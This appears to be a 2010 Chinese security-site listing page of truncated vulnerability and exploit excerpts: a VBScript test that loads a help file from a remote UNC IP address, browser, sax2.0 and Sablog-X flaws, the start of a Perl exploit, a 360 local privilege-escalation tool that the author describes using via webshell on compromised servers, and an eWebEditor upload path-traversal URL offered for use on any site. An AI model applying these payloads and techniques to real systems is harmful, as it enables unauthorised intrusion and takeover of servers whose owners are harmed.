测试代码: <html> <script type="text/vbscript"> big = "\\184.73.14.110\PUBLIC\test.hlp" //For i=1 to 2500 // big = big & "\..\" //Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, ReadMore
查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux ReadMore
作者:xisigr 测试版本:搜狗浏览器版本:1.4.0.418(正式版) 漏洞成因:在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻 ReadMore
作者:Ryat 前不久80vul公布了sax2.0的一个漏洞,随后4ngel发布了补丁,不过权限验证部分的代码还是存在问题,下面就来简单说说这个漏洞:D // cp.php if (!$sax_uid || !$sax_pw || !$sax_logincount || !$sax_hash) { // ReadMore
利用代码: #!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008 8 \n"; print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n"; print "8eeeee ReadMore
作者:80vul-B 一 描叙: 由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。 二 分析 common.inc.php代码里: .... $onoff = ReadMore
作者:oldjun 不知道该说什么好了,以前拿了很多shell,一直懒得提权,一是没那个必要,二是提权太累了,三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权,何乐而不为呢? 于是360本地提权来了,最近已经沸沸扬扬的了,不多发表过多评论,只是觉得做公司更要厚道;本人菜另外还有很多兄弟在360,不说什么了,发了本地提权的利用程序吧。friddy那里已经有一份了,是用来替换5下shift为cmd.exe的360本地提权webshell下测试程序。 瑞星说是“bregdrv.sys和bregdll.dll”出的问题,然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的,于是这个利用程序也是基于这个的。webshell下使用,guest权限即可,需要Wscript.shell支持,功能主要是: 1.开启终端服务,端口为3389;用法:360.exe ReadMore
eWebEditor全版本通杀 利用方法: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.. 大家照着去换吧! ReadMore
2010年03月03日 |
